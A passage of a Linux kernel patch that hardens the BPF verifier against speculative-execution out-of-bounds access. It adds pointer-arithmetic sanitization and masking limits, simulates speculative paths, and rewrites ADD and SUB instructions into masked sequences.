+	elem->st.speculative |= speculative;
 	if (env->stack_size > BPF_COMPLEXITY_LIMIT_STACK) {
 		verbose(env, "BPF program is too complex\n");
 		goto err;
@@ -3067,6 +3070,102 @@  static bool check_reg_sane_offset(struct bpf_verifier_env *env,
 	return true;
 }
 
+static struct bpf_insn_aux_data *cur_aux(struct bpf_verifier_env *env)
+{
+	return &env->insn_aux_data[env->insn_idx];
+}
+
+static int retrieve_ptr_limit(const struct bpf_reg_state *ptr_reg,
+			      u32 *ptr_limit, u8 opcode, bool off_is_neg)
+{
+	bool mask_to_left = (opcode == BPF_ADD &&  off_is_neg) ||
+			    (opcode == BPF_SUB && !off_is_neg);
+	u32 off;
+
+	switch (ptr_reg->type) {
+	case PTR_TO_STACK:
+		off = ptr_reg->off + ptr_reg->var_off.value;
+		if (mask_to_left)
+			*ptr_limit = MAX_BPF_STACK + off;
+		else
+			*ptr_limit = -off;
+		return 0;
+	case PTR_TO_MAP_VALUE:
+		if (mask_to_left) {
+			*ptr_limit = ptr_reg->umax_value + ptr_reg->off;
+		} else {
+			off = ptr_reg->smin_value + ptr_reg->off;
+			*ptr_limit = ptr_reg->map_ptr->value_size - off;
+		}
+		return 0;
+	default:
+		return -EINVAL;
+	}
+}
+
+static int sanitize_ptr_alu(struct bpf_verifier_env *env,
+			    struct bpf_insn *insn,
+			    const struct bpf_reg_state *ptr_reg,
+			    struct bpf_reg_state *dst_reg,
+			    bool off_is_neg)
+{
+	struct bpf_verifier_state *vstate = env->cur_state;
+	struct bpf_insn_aux_data *aux = cur_aux(env);
+	bool ptr_is_dst_reg = ptr_reg == dst_reg;
+	u8 opcode = BPF_OP(insn->code);
+	u32 alu_state, alu_limit;
+	struct bpf_reg_state tmp;
+	bool ret;
+
+	if (env->allow_ptr_leaks || BPF_SRC(insn->code) == BPF_K)
+		return 0;
+
+	/* We already marked aux for masking from non-speculative
+	 * paths, thus we got here in the first place. We only care
+	 * to explore bad access from here.
+	 */
+	if (vstate->speculative)
+		goto do_sim;
+
+	alu_state  = off_is_neg ? BPF_ALU_NEG_VALUE : 0;
+	alu_state |= ptr_is_dst_reg ?
+		     BPF_ALU_SANITIZE_SRC : BPF_ALU_SANITIZE_DST;
+
+	if (retrieve_ptr_limit(ptr_reg, &alu_limit, opcode, off_is_neg))
+		return 0;
+
+	/* If we arrived here from different branches with different
+	 * limits to sanitize, then this won't work.
+	 */
+	if (aux->alu_state &&
+	    (aux->alu_state != alu_state ||
+	     aux->alu_limit != alu_limit))
+		return -EACCES;
+
+	/* Corresponding fixup done in fixup_bpf_calls(). */
+	aux->alu_state = alu_state;
+	aux->alu_limit = alu_limit;
+
+do_sim:
+	/* Simulate and find potential out-of-bounds access under
+	 * speculative execution from truncation as a result of
+	 * masking when off was not within expected range. If off
+	 * sits in dst, then we temporarily need to move ptr there
+	 * to simulate dst (== 0) +/-= ptr. Needed, for example,
+	 * for cases where we use K-based arithmetic in one direction
+	 * and truncated reg-based in the other in order to explore
+	 * bad access.
+	 */
+	if (!ptr_is_dst_reg) {
+		tmp = *dst_reg;
+		*dst_reg = *ptr_reg;
+	}
+	ret = push_stack(env, env->insn_idx + 1, env->insn_idx, true);
+	if (!ptr_is_dst_reg)
+		*dst_reg = tmp;
+	return !ret ? -EFAULT : 0;
+}
+
 /* Handles arithmetic on a pointer and a scalar: computes new min/max and var_off.
  * Caller should also handle BPF_MOV case separately.
  * If we return -EACCES, caller may want to try again treating pointer as a
@@ -3087,6 +3186,7 @@  static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
 	    umin_ptr = ptr_reg->umin_value, umax_ptr = ptr_reg->umax_value;
 	u32 dst = insn->dst_reg, src = insn->src_reg;
 	u8 opcode = BPF_OP(insn->code);
+	int ret;
 
 	dst_reg = &regs[dst];
 
@@ -3142,6 +3242,11 @@  static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
 
 	switch (opcode) {
 	case BPF_ADD:
+		ret = sanitize_ptr_alu(env, insn, ptr_reg, dst_reg, smin_val < 0);
+		if (ret < 0) {
+			verbose(env, "R%d tried to add from different maps or paths\n", dst);
+			return ret;
+		}
 		/* We can take a fixed offset as long as it doesn't overflow
 		 * the s32 'off' field
 		 */
@@ -3192,6 +3297,11 @@  static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
 		}
 		break;
 	case BPF_SUB:
+		ret = sanitize_ptr_alu(env, insn, ptr_reg, dst_reg, smin_val < 0);
+		if (ret < 0) {
+			verbose(env, "R%d tried to sub from different maps or paths\n", dst);
+			return ret;
+		}
 		if (dst_reg == off_reg) {
 			/* scalar -= pointer.  Creates an unknown scalar */
 			verbose(env, "R%d tried to subtract pointer from scalar\n",
@@ -4389,7 +4499,8 @@  static int check_cond_jmp_op(struct bpf_verifier_env *env,
 		}
 	}
 
-	other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx);
+	other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx,
+				  false);
 	if (!other_branch)
 		return -EFAULT;
 	other_branch_regs = other_branch->frame[other_branch->curframe]->regs;
@@ -5499,6 +5610,12 @@  static bool states_equal(struct bpf_verifier_env *env,
 	if (old->curframe != cur->curframe)
 		return false;
 
+	/* Verification state from speculative execution simulation
+	 * must never prune a non-speculative execution one.
+	 */
+	if (old->speculative && !cur->speculative)
+		return false;
+
 	/* for states to be equal callsites have to be the same
 	 * and all frame states need to be equivalent
 	 */
@@ -5700,6 +5817,7 @@  static int do_check(struct bpf_verifier_env *env)
 	if (!state)
 		return -ENOMEM;
 	state->curframe = 0;
+	state->speculative = false;
 	state->frame[0] = kzalloc(sizeof(struct bpf_func_state), GFP_KERNEL);
 	if (!state->frame[0]) {
 		kfree(state);
@@ -5739,8 +5857,10 @@  static int do_check(struct bpf_verifier_env *env)
 			/* found equivalent state, can prune the search */
 			if (env->log.level) {
 				if (do_print_state)
-					verbose(env, "\nfrom %d to %d: safe\n",
-						env->prev_insn_idx, env->insn_idx);
+					verbose(env, "\nfrom %d to %d%s: safe\n",
+						env->prev_insn_idx, env->insn_idx,
+						env->cur_state->speculative ?
+						" (speculative execution)" : "");
 				else
 					verbose(env, "%d: safe\n", env->insn_idx);
 			}
@@ -5757,8 +5877,10 @@  static int do_check(struct bpf_verifier_env *env)
 			if (env->log.level > 1)
 				verbose(env, "%d:", env->insn_idx);
 			else
-				verbose(env, "\nfrom %d to %d:",
-					env->prev_insn_idx, env->insn_idx);
+				verbose(env, "\nfrom %d to %d%s:",
+					env->prev_insn_idx, env->insn_idx,
+					env->cur_state->speculative ?
+					" (speculative execution)" : "");
 			print_verifier_state(env, state->frame[state->curframe]);
 			do_print_state = false;
 		}
@@ -6750,6 +6872,57 @@  static int fixup_bpf_calls(struct bpf_verifier_env *env)
 			continue;
 		}
 
+		if (insn->code == (BPF_ALU64 | BPF_ADD | BPF_X) ||
+		    insn->code == (BPF_ALU64 | BPF_SUB | BPF_X)) {
+			const u8 code_add = BPF_ALU64 | BPF_ADD | BPF_X;
+			const u8 code_sub = BPF_ALU64 | BPF_SUB | BPF_X;
+			struct bpf_insn insn_buf[16];
+			struct bpf_insn *patch = &insn_buf[0];
+			bool issrc, isneg;
+			u32 off_reg;
+
+			aux = &env->insn_aux_data[i + delta];
+			if (!aux->alu_state)
+				continue;
+
+			isneg = aux->alu_state & BPF_ALU_NEG_VALUE;
+			issrc = (aux->alu_state & BPF_ALU_SANITIZE) ==
+				BPF_ALU_SANITIZE_SRC;
+
+			off_reg = issrc ? insn->src_reg : insn->dst_reg;
+			if (isneg)
+				*patch++ = BPF_ALU64_IMM(BPF_MUL, off_reg, -1);
+			*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit - 1);
+			*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);
+			*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);
+			*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);
+			*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);
+			if (issrc) {
+				*patch++ = BPF_ALU64_REG(BPF_AND, BPF_REG_AX,
+							 off_reg);
+				insn->src_reg = BPF_REG_AX;
+			} else {
+				*patch++ = BPF_ALU64_REG(BPF_AND, off_reg,
+							 BPF_REG_AX);
+			}
+			if (isneg)
+				insn->code = insn->code == code_add ?
+					     code_sub : code_add;
+			*patch++ = *insn;
+			if (issrc && isneg)
+				*patch++ = BPF_ALU64_IMM(BPF_MUL, off_reg, -1);
+			cnt = patch - insn_buf;
+
+			new_prog = bpf_patch_insn_data(env, i + delta, insn_buf, cnt);
+			if (!new_prog)
+				return -ENOMEM;
+
+			delta    += cnt - 1;
+			env->prog = prog = new_prog;
+			insn      = new_prog->insnsi + i + delta;
+			continue;
+		}
+
 		if (insn->code != (BPF_JMP | BPF_CALL))
 			continue;
 		if (insn->src_reg == BPF_PSEUDO_CALL)